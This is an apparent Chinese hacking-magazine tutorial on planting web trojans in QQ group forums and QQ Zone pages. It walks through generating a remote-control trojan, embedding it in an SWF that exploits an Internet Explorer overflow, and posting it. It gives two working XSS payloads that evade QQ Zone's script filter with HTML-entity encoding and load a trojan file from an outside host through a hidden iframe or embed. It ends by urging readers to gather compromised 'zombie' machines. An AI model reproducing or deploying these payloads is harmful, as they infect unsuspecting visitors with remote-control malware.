有無數(shù)上網(wǎng)用戶每天都在使用QQ，大家往往注重于QQ尾巴病毒、QQ傳木馬之類的攻擊方式，卻很少有人注意到我們經(jīng)常訪問的QQ群、QQ空間里面隱藏著更大的安全危險，遠(yuǎn)比QQ尾巴病毒、QQ傳木馬之類的隱蔽得多，危害更加大。今天我們就來看看攻擊者是如何在QQ群和QQ空間中掛上網(wǎng)頁木馬，攻擊瀏覽用戶的!

　　一、QQ群中簡簡單單掛木馬

　　在一個比較火的QQ群里掛上網(wǎng)頁木馬，一定很容易得到許多肉雞的。怎么在QQ群里掛馬，是在群里面群發(fā)木馬的網(wǎng)址嗎?現(xiàn)在已經(jīng)不會有人上這樣的當(dāng)了。我們要作的只是在群里面發(fā)一個作了手腳的帖子。

　　步驟一:制作網(wǎng)頁木馬

　　在攻擊前，我們首先要制作好一個木馬網(wǎng)頁。這里筆者使用了“上興遠(yuǎn)程控制木馬V2006”，這個木馬功能非常強(qiáng)，以前筆者曾作過介紹。用上興生成木馬服務(wù)端程序“muma.exe”后，將服務(wù)端上傳到某個網(wǎng)站上去，假設(shè)地址為“http://www.binghewu.com.cn/muma.exe”。

　　打開“南域劍盟網(wǎng)頁木馬生成器”，在中間的“URL”處填入木馬的鏈接地址，點擊“生成”按鈕，將會在生成器當(dāng)前目錄下生成一個名為“script.txt”的文件(如圖1)。用記事本打開剛才生成的“script.txt”文件，可以看到木馬代碼，代碼是經(jīng)過加密的，一般人很難看出這是網(wǎng)頁木馬代碼來(如圖2)。復(fù)制所有代碼，然后將代碼插入到任意一個正常的網(wǎng)頁中，就可以得到一個網(wǎng)頁木馬了。

　　小提示:將木馬代碼插入正常的網(wǎng)頁中，其位置一般是位于“”標(biāo)記中間。

圖1 用木馬生成器生成木馬代碼

圖2 加密的木馬代碼…

　　步驟二:制作SWF木馬

　　在以前的QQ群中，本來只需要發(fā)一張帶圖片的帖子就可以實現(xiàn)掛馬的目的。不過現(xiàn)在QQ群也改版了，掛馬就需要多一個步驟了，我們還需要將網(wǎng)頁木馬嵌入Flash文件中。

　　打開“SWF插馬工具(Icode To SWF)”，在“SWF文件”中瀏覽選擇本機(jī)上的某個正常的Flash文件;在“插入代碼”中填寫剛才與在的網(wǎng)頁木馬的鏈接地址(如圖3)。然后點擊“給我插”按鈕，即可將網(wǎng)頁木馬鏈接插入到正常的Flash文件中了。SWF插馬工具生成的Flash文件是利用了一個IE漏洞，對方打開Flash文件后，就會造成IE溢出，自動訪問木馬網(wǎng)頁在后臺下載運行木馬程序。

圖3 生成SWF木馬

　　步驟三:在QQ群中掛馬

　　首先將剛才生成的SWF木馬文件上傳到某個空間中，然后打開某個QQ群的BBS欄目，點擊“發(fā)表新文章”。在新文章書寫頁面中點擊“插入Flash”按鈕，輸入SWF木馬文件的網(wǎng)絡(luò)鏈接地址及長寬，然后點擊后面的小鉤按鈕，插入Flash文件(如圖4)。發(fā)表新文章后，當(dāng)有人在QQ群中打開查看這篇文章時，就會自動播放Flash并在后臺下載運行上興木馬服務(wù)端了。

圖4 在QQ群中發(fā)布Flash木馬

　　小提示:當(dāng)然我們也可以直接在QQ群中散布SWF木馬文件的網(wǎng)址，別人點擊后一樣會中木馬，不過這種方式不如發(fā)布文章隱蔽和效果好，攻擊的持續(xù)性也不強(qiáng)。

二、QQ空間玩掛馬

　　自從騰訊推出QQ空間(QQ-zone)后，各種跨站漏洞便不斷暴出。雖然騰訊已經(jīng)對QQ-zone進(jìn)行了一次全面的更新，禁止了運行自定義腳本，不過通過我們的測試，發(fā)現(xiàn)所做的限制是很簡單的，只需要轉(zhuǎn)換一下字符就可以突破限制，在QQ空間上任意掛馬。

　　方法一:掛Flash木馬

　　打開QQ空間后，在頁面中點擊“自定義”按鈕，在彈出的工具條上依次單擊“個性設(shè)置”→“新建模塊”命令，也可在QQ空間頁面中直接按下+組合鍵，打開自定義對話框。在彈出的網(wǎng)頁對話框中輸入任意“模塊名稱”，點擊“提交”按鈕，彈出創(chuàng)建成功的提示框。然后出現(xiàn)“添加內(nèi)容”對話框，將其中的“網(wǎng)址”、“圖片”中自帶的“http://”刪除，保持“鏈接名稱”為空白。在“評論”中輸入如下代碼(如圖5):

“<img src="javascri&#112;t:document.getElementById('Mlogo').&#105;nnerHTML+='<div style='position:absolute;top:0;left:0;'><EMBED src='http://www.binghewu.com.cn/muma.swf' quality=high wmode='transparent' WIDTH='925' HEIGHT='655' TYPE='application/x-shockwave-flash'></div>';"> ”

　　代碼中的Flash地址“http://www.binghewu.com.cn/muma.swf”，是剛才制作上傳的SWF木馬鏈接地址，可以更改為其它任意Flash木馬文件地址。提交代碼后，用戶進(jìn)入此QQ空間時，會自動打開顯示上傳的SWF木馬Flash，從而在后臺下載運行上興木馬服務(wù)端程序。

圖5 通過自定義模塊添加SWF木馬

　　小提示:QQ空間是通過檢測用戶提交的代碼中，是否含用“javascript”之類的字符進(jìn)行過濾的。在上面的代碼中，將腳本部分代碼用ASCII編碼之后替換躲過了過濾，如“javascript”可以替換為“javascrip”，“p”為“p”的ASCII編碼。具體ASCII編碼轉(zhuǎn)換可到“http://www.killadm.ful.cn/ascii.asp”查詢(如圖6)。

圖6 通過網(wǎng)頁轉(zhuǎn)換字符ASCII碼

　　方法二:掛網(wǎng)頁木馬

　　上面的方法是直接在QQ空間中掛上一個Flash木馬文件，實現(xiàn)的方法雖然比較簡單，不過這個Flash文件有可能會讓別人起疑心。既然我們可以在QQ空間中寫入自定義代碼，何不干脆直接掛上網(wǎng)頁木馬呢?

　　用上面同樣的方法新建一個模塊，代碼如下:

　

“<div id=DI><img src="javascri&#112;t:DI.&#105;nnerHTML='<&#105;frame src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></&#105;frame>'" style=display:none></div>”

　　同樣的，在上面的代碼中已經(jīng)作了ASCII碼轉(zhuǎn)換躲過過濾;“http://www.binghewu.com.cn/muma.htm”是網(wǎng)頁木馬的鏈接地址，可以換成其它木馬網(wǎng)頁地址。代碼中的其它語句是用來定義模塊大小的，由于設(shè)置為0，該模塊將在QQ空間中被隱藏，但是并不影響木馬網(wǎng)頁的打開與運行。這里為了說明攻擊效果，筆者對代碼作了一些修改，將木馬網(wǎng)頁顯示為新浪首頁，說明完全可以在QQ空間中打開其它木馬網(wǎng)頁的(如圖7)。

圖7 在QQ空間中掛上的新浪頁面

　　怎么樣，在QQ群和QQ空間中掛馬是不是很簡單?掌握了這個方法，只要在比較火一點的QQ群或QQ空間中掛上你的木馬，你很快就可以肉雞成群了!